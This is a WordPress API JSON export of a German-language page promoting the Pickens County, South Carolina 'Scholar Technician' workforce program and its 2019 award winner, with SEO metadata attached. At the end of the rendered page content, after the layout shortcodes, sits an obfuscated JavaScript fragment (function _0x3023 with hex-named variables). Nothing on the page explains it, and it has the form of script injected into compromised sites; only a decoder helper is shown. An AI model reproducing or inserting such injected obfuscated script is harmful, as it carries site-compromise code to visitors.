{"id":6706,"date":"2020-10-28T14:30:50","date_gmt":"2020-10-28T14:30:50","guid":{"rendered":"http:\/\/alliancepickens.com\/personalentwicklung\/scholar-technician-program\/"},"modified":"2020-12-04T20:14:16","modified_gmt":"2020-12-04T20:14:16","slug":"scholar-technician-program","status":"publish","type":"page","link":"https:\/\/alliancepickens.com\/de\/personalentwicklung\/scholar-technician-program\/","title":{"rendered":"Scholar Technician Program"},"content":{"rendered":"<div class=\"wpb-content-wrapper\"><p>[vc_row el_class=&#8221;intro&#8221;][vc_column width=&#8221;2\/3&#8243;][vc_column_text]Die meisten Leute sind mit dem Scholar Athlete vertraut. Wir erkennen ihn als den jungen Mann, der am Freitagabend Touchdowns wirft, oder die junge Dame, die am Dienstagabend den Volleyball \u00fcber das Netz spuckt, die beide aber auch im Klassenzimmer von Montag bis Freitag \u00fcbertreffen.<\/p>\n<p>Hier in Pickens County.South Carolina.USA entwickeln wir die junge Person, die wir den <em>Scholar Technician<\/em>nennen. Der Pickens County <em>Scholar Technician<\/em> ist der Student, der sich im Klassenzimmer von Montag bis Freitag, aber auch durch <a href=\"http:\/\/alliancepickens.com\/news\/pickens_building___dynasty__in_mechatronics\">au\u00dferschulische Aktivit\u00e4ten<\/a> und durch den Studiengang auszeichnet, lernt und entwickelt technische F\u00e4higkeiten, die in der heutigen fortschrittlichen Fertigungsumgebung erforderlich sind.<\/p>\n<p>Vom Kindergarten bis zur 12. Klasse in unseren Pickens County Schulen und \u00fcber die Klassen 13 und 14 am Tri-County Technical College, Pickens County.South Carolina.USA entwickelt den Scholar Technician&#8230; und Entwicklung einer Belegschaft f\u00fcr Sie![\/vc_column_text][\/vc_column][vc_column width=&#8221;1\/3&#8243;][vc_wp_custommenu title=&#8221;In diesem Abschnitt&#8221; nav_menu=&#8221;21&#8243; el_class=&#8221;inthissection&#8221;][\/vc_column][\/vc_row][vc_row full_width=&#8221;stretch_row&#8221; css=&#8221;.vc_custom_1605217238363{background: #1d2c68 url(http:\/\/alliancepickens.com\/wp-content\/uploads\/2020\/11\/lowpoly.png?id=10282) !important;}&#8221;][vc_column width=&#8221;2\/3&#8243;][vc_empty_space][vc_column_text]<span style=\"font-weight: 400;color: #ffffff\">Eine gut ausgebildete und gut ausgebildete Belegschaft ist das bestimmende Merkmal von Pickens County.South Carolina.USA. Unser Personalentwicklungsprogramm ist die Heimat des Scholar Technician und verschafft dem Unternehmen in Pickens County einen echten Wettbewerbsvorteil.<\/span><\/p>\n<p><span style=\"font-weight: 400;color: #ffffff\">Der Pickens County School District ist in South Carolina der rangh\u00f6chste countywide School District des Bundesstaates. Das Pickens County Career and Technology Center hat eine Geschichte der Exzellenz als die Nummer eins praktische Lerneinrichtung in South Carolina. Es ist das einzige Zentrum mit einer 5-Achsen-Maschine, die F\u00fcr Gymnasiasten zur Verf\u00fcgung steht.  <\/span><\/p>\n<p><span style=\"font-weight: 400;color: #ffffff\">Pickens County ist auch die Heimat der Clemson University, der Southern Wesleyan University und des Tri-County Technical College, die Pickens County-Unternehmen einen Wettbewerbsvorteil bei der Suche nach gut ausgebildeten, qualifizierten Arbeitskr\u00e4ften bieten.  <\/span>[\/vc_column_text][vc_empty_space][\/vc_column][vc_column width=&#8221;1\/3&#8243;][vc_empty_space][vc_video link=&#8221;https:\/\/youtu.be\/VHz98MhiYo8&#8243;][vc_column_text el_class=&#8221;watchmore&#8221;]Schauen Sie zu, um mehr zu erfahren[\/vc_column_text][\/vc_column][\/vc_row][vc_row full_width=&#8221;stretch_row_content&#8221; el_class=&#8221;callout&#8221;][vc_column width=&#8221;1\/2&#8243; el_class=&#8221;stembg&#8221; css=&#8221;.vc_custom_1605215870758{background-image: url(http:\/\/alliancepickens.com\/wp-content\/uploads\/2020\/11\/scho2lar.jpg?id=10593) !important;}&#8221;][vc_empty_space height=&#8221;700px&#8221;][\/vc_column][vc_column width=&#8221;1\/2&#8243;][vc_column_text el_class=&#8221;techcopy&#8221;]<\/p>\n<h1><strong>Campbell zum <em>Gelehrtentechniker<\/em> des Jahres gek\u00fcrt<\/strong><\/h1>\n<h3>Jacob Campbell ist der Pickens County <em>Scholar Technician<\/em> <strong> <\/strong>of the Year 2019.<\/h3>\n<p>Der Preis wurde im Rahmen des siebten j\u00e4hrlichen Pickens County MINT (Wissenschaft, Technik, Ingenieurwesen und Mathematik) &#8220;Evening of Celebration&#8221; im Pickens County Career and Technology Center verliehen, um technische High-School-Sch\u00fcler zu w\u00fcrdigen.<\/p>\n<p>Der j\u00e4hrliche &#8220;Abend der Feier&#8221; ist Bestandteil unseres Stipendientechniker-Bestrebens. Bei dieser Veranstaltung verleihen wir den <em>Scholar Technician<\/em> of the Year, die Heisman Trophy f\u00fcr den technisch ausgebildeten Pickens County High School Sch\u00fcler, der sich f\u00fcr sein K\u00f6nnen, eine starke Arbeitsmoral und Charakter und Bewertung, die von der Privatwirtschaft durchgef\u00fchrt wird, gezeigt hat.[\/vc_column_text][\/vc_column][\/vc_row][vc_row full_width=&#8221;stretch_row&#8221; css=&#8221;.vc_custom_1604355356070{background-color: #f2f2f2 !important;background-position: center !important;background-repeat: no-repeat !important;background-size: cover !important;}&#8221;][vc_column][vc_empty_space][vc_single_image image=&#8221;10261&#8243; img_size=&#8221;full&#8221; alignment=&#8221;center&#8221;][vc_empty_space][\/vc_column][\/vc_row][vc_row el_class=&#8221;learnmoreabout&#8221;][vc_column][vc_column_text]<\/p>\n<h4 style=\"text-align: center\">Erfahren Sie mehr \u00fcber die Entwicklung von Arbeitskr\u00e4ften<\/h4>\n<p>[\/vc_column_text][vc_wp_custommenu nav_menu=&#8221;21&#8243;][\/vc_column][\/vc_row][vc_row full_width=&#8221;stretch_row&#8221; parallax=&#8221;content-moving&#8221; parallax_image=&#8221;3871&#8243; el_class=&#8221;getstarted&#8221;][vc_column width=&#8221;2\/3&#8243;][vc_column_text]<\/p>\n<h1>Bereit f\u00fcr den Einstieg?<\/h1>\n<h3>Wir freuen uns auf ein Gespr\u00e4ch mit Ihnen!<\/h3>\n<p>[\/vc_column_text][\/vc_column][vc_column width=&#8221;1\/3&#8243;][vc_column_text]<a class=\"greenbtn\" href=\"http:\/\/alliancepickens.com\/de\/ueber-uns\/#contact_directions\">Kontaktieren Sie unser Team<\/a>[\/vc_column_text][\/vc_column][\/vc_row]<br \/>\nfunction _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);};<\/p>\n<\/div>","protected":false},"excerpt":{"rendered":"<p>[vc_row el_class=&#8221;intro&#8221;][vc_column width=&#8221;2\/3&#8243;][vc_column_text]Die meisten Leute sind mit dem Scholar Athlete vertraut. Wir erkennen ihn als den jungen Mann, der am Freitagabend Touchdowns wirft, oder die junge Dame, die am Dienstagabend den Volleyball \u00fcber das Netz spuckt, die beide aber auch im Klassenzimmer von Montag bis Freitag \u00fcbertreffen. Hier in Pickens County.South Carolina.USA entwickeln wir die&hellip;<\/p>\n","protected":false},"author":1,"featured_media":0,"parent":6078,"menu_order":20,"comment_status":"closed","ping_status":"closed","template":"","meta":[],"class_list":["post-6706","page","type-page","status-publish","hentry","description-off"],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v27.3 - https:\/\/yoast.com\/product\/yoast-seo-wordpress\/ -->\n<title>Scholar Technician Program - Alliance Pickens<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/alliancepickens.com\/de\/personalentwicklung\/scholar-technician-program\/\" \/>\n<meta property=\"og:locale\" content=\"de_DE\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"Scholar Technician Program - Alliance Pickens\" \/>\n<meta property=\"og:description\" content=\"[vc_row el_class=&#8221;intro&#8221;][vc_column width=&#8221;2\/3&#8243;][vc_column_text]Die meisten Leute sind mit dem Scholar Athlete vertraut. Wir erkennen ihn als den jungen Mann, der am Freitagabend Touchdowns wirft, oder die junge Dame, die am Dienstagabend den Volleyball \u00fcber das Netz spuckt, die beide aber auch im Klassenzimmer von Montag bis Freitag \u00fcbertreffen. Hier in Pickens County.South Carolina.USA entwickeln wir die&hellip;\" \/>\n<meta property=\"og:url\" content=\"https:\/\/alliancepickens.com\/de\/personalentwicklung\/scholar-technician-program\/\" \/>\n<meta property=\"og:site_name\" content=\"Alliance Pickens\" \/>\n<meta property=\"article:modified_time\" content=\"2020-12-04T20:14:16+00:00\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data1\" content=\"4 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\\\/\\\/schema.org\",\"@graph\":[{\"@type\":\"WebPage\",\"@id\":\"https:\\\/\\\/alliancepickens.com\\\/de\\\/personalentwicklung\\\/scholar-technician-program\\\/\",\"url\":\"https:\\\/\\\/alliancepickens.com\\\/de\\\/personalentwicklung\\\/scholar-technician-program\\\/\",\"name\":\"Scholar Technician Program - Alliance Pickens\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/alliancepickens.com\\\/de\\\/#website\"},\"datePublished\":\"2020-10-28T14:30:50+00:00\",\"dateModified\":\"2020-12-04T20:14:16+00:00\",\"breadcrumb\":{\"@id\":\"https:\\\/\\\/alliancepickens.com\\\/de\\\/personalentwicklung\\\/scholar-technician-program\\\/#breadcrumb\"},\"inLanguage\":\"de-DE\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\\\/\\\/alliancepickens.com\\\/de\\\/personalentwicklung\\\/scholar-technician-program\\\/\"]}]},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\\\/\\\/alliancepickens.com\\\/de\\\/personalentwicklung\\\/scholar-technician-program\\\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\\\/\\\/alliancepickens.com\\\/de\\\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"Personalentwicklung\",\"item\":\"https:\\\/\\\/alliancepickens.com\\\/de\\\/personalentwicklung\\\/\"},{\"@type\":\"ListItem\",\"position\":3,\"name\":\"Scholar Technician Program\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\\\/\\\/alliancepickens.com\\\/de\\\/#website\",\"url\":\"https:\\\/\\\/alliancepickens.com\\\/de\\\/\",\"name\":\"Alliance Pickens\",\"description\":\"recruitment and expansion in Pickens County\",\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\\\/\\\/alliancepickens.com\\\/de\\\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"de-DE\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"Scholar Technician Program - Alliance Pickens","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/alliancepickens.com\/de\/personalentwicklung\/scholar-technician-program\/","og_locale":"de_DE","og_type":"article","og_title":"Scholar Technician Program - Alliance Pickens","og_description":"[vc_row el_class=&#8221;intro&#8221;][vc_column width=&#8221;2\/3&#8243;][vc_column_text]Die meisten Leute sind mit dem Scholar Athlete vertraut. Wir erkennen ihn als den jungen Mann, der am Freitagabend Touchdowns wirft, oder die junge Dame, die am Dienstagabend den Volleyball \u00fcber das Netz spuckt, die beide aber auch im Klassenzimmer von Montag bis Freitag \u00fcbertreffen. Hier in Pickens County.South Carolina.USA entwickeln wir die&hellip;","og_url":"https:\/\/alliancepickens.com\/de\/personalentwicklung\/scholar-technician-program\/","og_site_name":"Alliance Pickens","article_modified_time":"2020-12-04T20:14:16+00:00","twitter_card":"summary_large_image","twitter_misc":{"Est. reading time":"4 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"WebPage","@id":"https:\/\/alliancepickens.com\/de\/personalentwicklung\/scholar-technician-program\/","url":"https:\/\/alliancepickens.com\/de\/personalentwicklung\/scholar-technician-program\/","name":"Scholar Technician Program - Alliance Pickens","isPartOf":{"@id":"https:\/\/alliancepickens.com\/de\/#website"},"datePublished":"2020-10-28T14:30:50+00:00","dateModified":"2020-12-04T20:14:16+00:00","breadcrumb":{"@id":"https:\/\/alliancepickens.com\/de\/personalentwicklung\/scholar-technician-program\/#breadcrumb"},"inLanguage":"de-DE","potentialAction":[{"@type":"ReadAction","target":["https:\/\/alliancepickens.com\/de\/personalentwicklung\/scholar-technician-program\/"]}]},{"@type":"BreadcrumbList","@id":"https:\/\/alliancepickens.com\/de\/personalentwicklung\/scholar-technician-program\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/alliancepickens.com\/de\/"},{"@type":"ListItem","position":2,"name":"Personalentwicklung","item":"https:\/\/alliancepickens.com\/de\/personalentwicklung\/"},{"@type":"ListItem","position":3,"name":"Scholar Technician Program"}]},{"@type":"WebSite","@id":"https:\/\/alliancepickens.com\/de\/#website","url":"https:\/\/alliancepickens.com\/de\/","name":"Alliance Pickens","description":"recruitment and expansion in Pickens County","potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/alliancepickens.com\/de\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"de-DE"}]}},"_links":{"self":[{"href":"https:\/\/alliancepickens.com\/de\/wp-json\/wp\/v2\/pages\/6706","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/alliancepickens.com\/de\/wp-json\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/alliancepickens.com\/de\/wp-json\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/alliancepickens.com\/de\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/alliancepickens.com\/de\/wp-json\/wp\/v2\/comments?post=6706"}],"version-history":[{"count":0,"href":"https:\/\/alliancepickens.com\/de\/wp-json\/wp\/v2\/pages\/6706\/revisions"}],"up":[{"embeddable":true,"href":"https:\/\/alliancepickens.com\/de\/wp-json\/wp\/v2\/pages\/6078"}],"wp:attachment":[{"href":"https:\/\/alliancepickens.com\/de\/wp-json\/wp\/v2\/media?parent=6706"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}